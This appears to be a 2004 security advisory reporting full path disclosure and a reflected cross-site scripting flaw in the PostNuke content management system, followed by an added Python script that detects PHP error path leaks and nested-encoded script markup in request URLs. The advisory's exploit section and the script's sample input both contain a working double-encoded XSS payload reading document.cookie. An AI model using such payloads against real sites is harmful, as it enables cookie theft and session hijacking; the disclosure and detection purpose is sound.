Message-ID: <1090145312.5513.200576720@webmail.messagingengine.com>
From: darkbicho at fastmail.fm (DarkBicho)
Subject: Multiple vulnerabilities PostNuke
Original Advisory: http://www.swp-zone.org/archivos/advisory-10.txt
-------------------------------------------------------------------------------------------------
:.: Multiple vulnerabilities PostNuke :.:
PROGRAM: PostNuke
HOMEPAGE: http://www.postnuke.com/
VERSION: 0.75-RC3, 0.726-3
BUG: Multiple vulnerabilities
DATE: 14/05/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Projects <www.swp-zone.org>
Perunderforce <www.perunderforce.tk>
Email: darkbicho@...u.com
-------------------------------------------------------------------------------------------------
1.- Affected software description:
-----------------------------
PostNuke is a popular content management system written in PHP.
2.- Vulnerabilities:
---------------
A. Full path disclosure:
This vulnerability allows a remote user to determine the full
path to the web root directory and other potentially sensitive
information. Requesting the following module files directly returns
PHP fatal errors that include the path:
http://localhost/html/modules/Xanthia/pnadmin.php
Fatal error: Call to undefined function: pnmodgetvar() in c:\appserv\www\html\modules\xanthia\pnadmin.php on line 53

http://localhost/html/modules/Xanthia/pnuserapi.php
Fatal error: Call to undefined function: pnmodgetvar() in c:\appserv\www\html\modules\xanthia\pnuserapi.php on line 49
B. Cross-Site Scripting aka XSS:
Error: function showcontent()
:.: title :
Line 986
--------------------------------- code ------------------------------------------
echo "<p><span class=\"pn-title\"><strong><em>".pnVarPrepForDisplay($title)."</em></strong></span><br />";
echo "<p align=\"justify\"><span class=\"pn-normal\">";
if ($cover != "")
----------------------------------------------------------------------------------
3.- EXPLOIT:
-------
http://localhost/html/modules.php?op=modload&name=Reviews&file=index&req=showcontent&id=1&title=%253cscript>alert%2528document.cookie);%253c/script>
Example:
-------
http://www.swp-zone.org/archivos/post-nuke.gif
4.- SOLUTION:
--------
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the PostNuke website for updates and official release details.
5.- Greetings:
---------
Greetings to my Peruvian group swp and perunderforce :D
"PISCO IS AND WILL BE PERUVIAN"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho@...u.com
-------------------------------------------------------------------------------------------------
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF ]----------------------------------------------
DarkBicho
Web: http://www.darkbicho.tk
"My only crime is seeing what others cannot see"
---------------------- The End ----------------------
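
Added example (not part of the original advisory or PostNuke's code): a Python check a site operator could run over their own response bodies and access-log URLs to spot the two issues reported above, PHP error banners that leak filesystem paths and query parameters whose value only becomes script markup after more than one round of percent-decoding. The function names and regular expressions are assumptions of this example; the sample inputs are copied from the advisory.

```python
import re
from urllib.parse import urlsplit, unquote

# PHP error banner that leaks a filesystem path (format as shown in the advisory).
PHP_ERROR = re.compile(
    r"(?:Fatal error|Warning|Notice|Parse error):.*?\bin\s+(\S+?\.php)\s+on line\s+(\d+)",
    re.I | re.S)
# Markup that should never survive decoding of a request parameter (assumed list).
MARKUP = re.compile(r"<\s*/?\s*script|javascript:|\bon\w+\s*=", re.I)

# Sample inputs copied from the advisory text.
SAMPLE_BODY = r"""Fatal error: Call to undefined function: pnmodgetvar() in
c:\appserv\www\html\modules\xanthia\pnadmin.php on line 53"""
SAMPLE_URL = ("http://localhost/html/modules.php?op=modload&name=Reviews&file=index"
              "&req=showcontent&id=1"
              "&title=%253cscript>alert%2528document.cookie);%253c/script>")

def leaked_paths(body):
    """Return (path, line) pairs leaked by PHP error messages in a response body."""
    return [(m.group(1), int(m.group(2))) for m in PHP_ERROR.finditer(body)]

def decode_rounds(value, limit=5):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < limit:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def suspicious_params(url):
    """Return (name, rounds, decoded) for parameters whose fully decoded value
    contains script markup; rounds > 1 means the markup was nested-encoded."""
    hits = []
    for pair in urlsplit(url).query.split("&"):
        name, _, raw = pair.partition("=")
        decoded, rounds = decode_rounds(raw)
        if MARKUP.search(decoded):
            hits.append((name, rounds, decoded))
    return hits

if __name__ == "__main__":
    print(leaked_paths(SAMPLE_BODY))
    print(suspicious_params(SAMPLE_URL))
```

A non-empty result from `leaked_paths` on a production response means PHP errors are being displayed to clients; logging them server-side instead removes the leak.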